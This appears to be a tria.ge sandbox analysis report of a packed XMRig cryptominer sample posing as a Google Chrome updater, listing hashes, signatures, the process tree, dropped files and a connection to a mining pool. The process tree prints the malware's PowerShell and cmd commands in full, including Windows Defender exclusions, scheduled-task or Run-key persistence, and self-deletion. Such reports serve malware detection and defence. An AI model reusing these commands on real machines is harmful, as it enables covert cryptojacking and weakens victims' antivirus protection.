Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

grhddhsGHs...6).exe

windows7-x64

10

grhddhsGHs...6).exe

windows10-2004-x64

10

grhddhsGHs... K.exe

windows7-x64

10

grhddhsGHs... K.exe

windows10-2004-x64

10

grhddhsGHs...7).exe

windows7-x64

10

grhddhsGHs...7).exe

windows10-2004-x64

10

grhddhsGHs...8).exe

windows7-x64

10

grhddhsGHs...8).exe

windows10-2004-x64

10

grhddhsGHs...9).exe

windows7-x64

10

grhddhsGHs...9).exe

windows10-2004-x64

10

grhddhsGHs...0).exe

windows7-x64

10

grhddhsGHs...0).exe

windows10-2004-x64

10

grhddhsGHs...1).exe

windows7-x64

10

grhddhsGHs...1).exe

windows10-2004-x64

10

grhddhsGHs...2).exe

windows7-x64

10

grhddhsGHs...2).exe

windows10-2004-x64

10

grhddhsGHs...3).exe

windows7-x64

10

grhddhsGHs...3).exe

windows10-2004-x64

10

grhddhsGHs...4).exe

windows7-x64

10

grhddhsGHs...4).exe

windows10-2004-x64

10

grhddhsGHs...5).exe

windows7-x64

10

grhddhsGHs...5).exe

windows10-2004-x64

10

grhddhsGHs...6).exe

windows7-x64

10

grhddhsGHs...6).exe

windows10-2004-x64

10

grhddhsGHs...7).exe

windows7-x64

10

grhddhsGHs...7).exe

windows10-2004-x64

10

grhddhsGHs...8).exe

windows7-x64

10

grhddhsGHs...8).exe

windows10-2004-x64

10

grhddhsGHs...9).exe

windows7-x64

10

grhddhsGHs...9).exe

windows10-2004-x64

10

grhddhsGHs...0).exe

windows7-x64

10

grhddhsGHs...0).exe

windows10-2004-x64

10

Resubmissions

11/02/2025, 16:33 UTC

250211-t2ztsstkey 10

11/02/2025, 16:33 UTC

250211-t2zh2atkex 10

11/02/2025, 16:33 UTC

250211-t2yxhatkew 10

11/02/2025, 16:33 UTC

250211-t2nrjasqdk 10

24/10/2024, 20:12 UTC

241024-yyvg5asemn 10

24/10/2024, 20:11 UTC

241024-yygk9ssemk 10

24/10/2024, 20:11 UTC

241024-yygahasemj 10

24/10/2024, 20:11 UTC

241024-yyd55sselq 10

24/10/2024, 20:08 UTC

241024-yw247asdqp 10

24/10/2024, 20:08 UTC

241024-yw1lcssdqn 10

Analysis

  • max time kernel
    1799s
  • max time network
    1796s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/10/2024, 20:08 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    grhddhsGHswgh/qM5GMXBk6hJE6Y5e (18).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10
xmrigexecutionminerupx

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 30 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3468
      • C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (18).exe
        "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (18).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1388
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4896
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3720
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (18).exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5048
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:2188
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3308
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3416
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:800
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:2712
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:1468
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4296
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:5108
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4564

          Network

          • flag-us
            DNS
            217.106.137.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            217.106.137.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            8.8.8.8.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            8.8.8.8.in-addr.arpa
            IN PTR
            Response
            8.8.8.8.in-addr.arpa
            IN PTR
            dnsgoogle
          • flag-us
            DNS
            134.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            134.190.18.2.in-addr.arpa
            IN PTR
            Response
            134.190.18.2.in-addr.arpa
            IN PTR
            a2-18-190-134deploystaticakamaitechnologiescom
          • flag-us
            DNS
            g.bing.com
            Remote address:
            8.8.8.8:53
            Request
            g.bing.com
            IN A
            Response
            g.bing.com
            IN CNAME
            g-bing-com.ax-0001.ax-msedge.net
            g-bing-com.ax-0001.ax-msedge.net
            IN CNAME
            ax-0001.ax-msedge.net
            ax-0001.ax-msedge.net
            IN A
            150.171.27.10
            ax-0001.ax-msedge.net
            IN A
            150.171.28.10
          • flag-us
            GET
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=
            Remote address:
            150.171.27.10:443
            Request
            GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            set-cookie: MUID=2AFF980F0AB96BE321A78D2D0B266AFF; domain=.bing.com; expires=Tue, 18-Nov-2025 21:01:46 GMT; path=/; SameSite=None; Secure; Priority=High;
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: 24923A6441CC47C9A1AA735941D423E5 Ref B: LON601060103062 Ref C: 2024-10-24T21:01:46Z
            date: Thu, 24 Oct 2024 21:01:45 GMT
          • flag-us
            GET
            https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=
            Remote address:
            150.171.27.10:443
            Request
            GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            cookie: MUID=2AFF980F0AB96BE321A78D2D0B266AFF
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            set-cookie: MSPTC=JI_4L40337b0FxMyZfGuQik0ynP1xCl3_DHk1MrZV7w; domain=.bing.com; expires=Tue, 18-Nov-2025 21:01:46 GMT; path=/; Partitioned; secure; SameSite=None
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: 1B79AF57CE7C472699247C05CA3988AD Ref B: LON601060103062 Ref C: 2024-10-24T21:01:46Z
            date: Thu, 24 Oct 2024 21:01:45 GMT
          • flag-us
            GET
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=
            Remote address:
            150.171.27.10:443
            Request
            GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            cookie: MUID=2AFF980F0AB96BE321A78D2D0B266AFF; MSPTC=JI_4L40337b0FxMyZfGuQik0ynP1xCl3_DHk1MrZV7w
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: 35128D3C09354543B0C8EB37BE623D24 Ref B: LON601060103062 Ref C: 2024-10-24T21:01:46Z
            date: Thu, 24 Oct 2024 21:01:46 GMT
          • flag-us
            DNS
            17.160.190.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            17.160.190.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            10.27.171.150.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            10.27.171.150.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            95.221.229.192.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            95.221.229.192.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            26.35.223.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            26.35.223.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            196.249.167.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            196.249.167.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            197.87.175.4.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            197.87.175.4.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            171.39.242.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            171.39.242.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            171.39.242.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            171.39.242.20.in-addr.arpa
            IN PTR
          • flag-us
            DNS
            139.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            139.190.18.2.in-addr.arpa
            IN PTR
            Response
            139.190.18.2.in-addr.arpa
            IN PTR
            a2-18-190-139deploystaticakamaitechnologiescom
          • flag-us
            DNS
            139.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            139.190.18.2.in-addr.arpa
            IN PTR
          • flag-us
            DNS
            pool.hashvault.pro
            conhost.exe
            Remote address:
            8.8.8.8:53
            Request
            pool.hashvault.pro
            IN A
            Response
            pool.hashvault.pro
            IN A
            95.179.241.203
            pool.hashvault.pro
            IN A
            45.76.89.70
          • flag-us
            DNS
            70.89.76.45.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            70.89.76.45.in-addr.arpa
            IN PTR
            Response
            70.89.76.45.in-addr.arpa
            IN PTR
            45768970vultrusercontentcom
          • flag-us
            DNS
            133.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            133.190.18.2.in-addr.arpa
            IN PTR
            Response
            133.190.18.2.in-addr.arpa
            IN PTR
            a2-18-190-133deploystaticakamaitechnologiescom
          • flag-us
            DNS
            30.243.111.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            30.243.111.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            7.173.189.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            7.173.189.20.in-addr.arpa
            IN PTR
            Response
          • 150.171.27.10:443
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=
            tls, http2
            2.1kB
             10.8kB
             23
            20

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=

            HTTP Response

            204

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=

            HTTP Response

            204

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=

            HTTP Response

            204
          • 45.76.89.70:3333
            pool.hashvault.pro
            tls
            conhost.exe
            30.6kB
             77.0kB
             257
            206
          • 8.8.8.8:53
            217.106.137.52.in-addr.arpa
            dns
            73 B
             147 B
             1
            1

            DNS Request

            217.106.137.52.in-addr.arpa

          • 8.8.8.8:53
            8.8.8.8.in-addr.arpa
            dns
            66 B
             90 B
             1
            1

            DNS Request

            8.8.8.8.in-addr.arpa

          • 8.8.8.8:53
            134.190.18.2.in-addr.arpa
            dns
            71 B
             135 B
             1
            1

            DNS Request

            134.190.18.2.in-addr.arpa

          • 8.8.8.8:53
            g.bing.com
            dns
            56 B
             148 B
             1
            1

            DNS Request

            g.bing.com

            DNS Response

            150.171.27.10
            150.171.28.10

          • 8.8.8.8:53
            17.160.190.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            17.160.190.20.in-addr.arpa

          • 8.8.8.8:53
            10.27.171.150.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            10.27.171.150.in-addr.arpa

          • 8.8.8.8:53
            95.221.229.192.in-addr.arpa
            dns
            73 B
             144 B
             1
            1

            DNS Request

            95.221.229.192.in-addr.arpa

          • 8.8.8.8:53
            26.35.223.20.in-addr.arpa
            dns
            71 B
             157 B
             1
            1

            DNS Request

            26.35.223.20.in-addr.arpa

          • 8.8.8.8:53
            196.249.167.52.in-addr.arpa
            dns
            73 B
             147 B
             1
            1

            DNS Request

            196.249.167.52.in-addr.arpa

          • 8.8.8.8:53
            197.87.175.4.in-addr.arpa
            dns
            71 B
             157 B
             1
            1

            DNS Request

            197.87.175.4.in-addr.arpa

          • 8.8.8.8:53
            171.39.242.20.in-addr.arpa
            dns
            144 B
             158 B
             2
            1

            DNS Request

            171.39.242.20.in-addr.arpa

            DNS Request

            171.39.242.20.in-addr.arpa

          • 8.8.8.8:53
            139.190.18.2.in-addr.arpa
            dns
            142 B
             135 B
             2
            1

            DNS Request

            139.190.18.2.in-addr.arpa

            DNS Request

            139.190.18.2.in-addr.arpa

          • 8.8.8.8:53
            pool.hashvault.pro
            dns
            conhost.exe
            64 B
             96 B
             1
            1

            DNS Request

            pool.hashvault.pro

            DNS Response

            95.179.241.203
            45.76.89.70

          • 8.8.8.8:53
            70.89.76.45.in-addr.arpa
            dns
            70 B
             116 B
             1
            1

            DNS Request

            70.89.76.45.in-addr.arpa

          • 8.8.8.8:53
            133.190.18.2.in-addr.arpa
            dns
            71 B
             135 B
             1
            1

            DNS Request

            133.190.18.2.in-addr.arpa

          • 8.8.8.8:53
            30.243.111.52.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            30.243.111.52.in-addr.arpa

          • 8.8.8.8:53
            7.173.189.20.in-addr.arpa
            dns
            71 B
             157 B
             1
            1

            DNS Request

            7.173.189.20.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

            Download Submit

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            77d622bb1a5b250869a3238b9bc1402b

            SHA1

            d47f4003c2554b9dfc4c16f22460b331886b191b

            SHA256

            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

            SHA512

            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            9121c719774820cf08353d8ba2a9e35f

            SHA1

            6145d196f22031214edf3d806b9598e1d0e4c3db

            SHA256

            28ff000c313d01c2a2d055f33db2bb6d9827351739f60003a97003b5ce5ef214

            SHA512

            b33d465182898c6ca298539b29dcd4c42f0e83267b33186e12cad64dc560dcfff987f91eafc0df7cbd744550605e6cfc5d81c234fbc54392bc273613ba050bd4

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h2fz3k24.gxf.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

            Download Submit

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

            Download Submit

          • memory/800-109-0x00007FF799CB0000-0x00007FF799CC6000-memory.dmp

            Filesize

            88KB

            Download

          • memory/800-114-0x00007FF799CB0000-0x00007FF799CC6000-memory.dmp

            Filesize

            88KB

            Download

          • memory/1388-18-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1388-29-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1388-31-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1388-32-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1388-34-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1388-19-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1552-1-0x00007FF986C53000-0x00007FF986C55000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1552-16-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1552-13-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1552-4-0x000001E341700000-0x000001E341722000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1552-12-0x00007FF986C50000-0x00007FF987711000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3308-70-0x000001A1AD560000-0x000001A1AD56A000-memory.dmp

            Filesize

            40KB

            Download

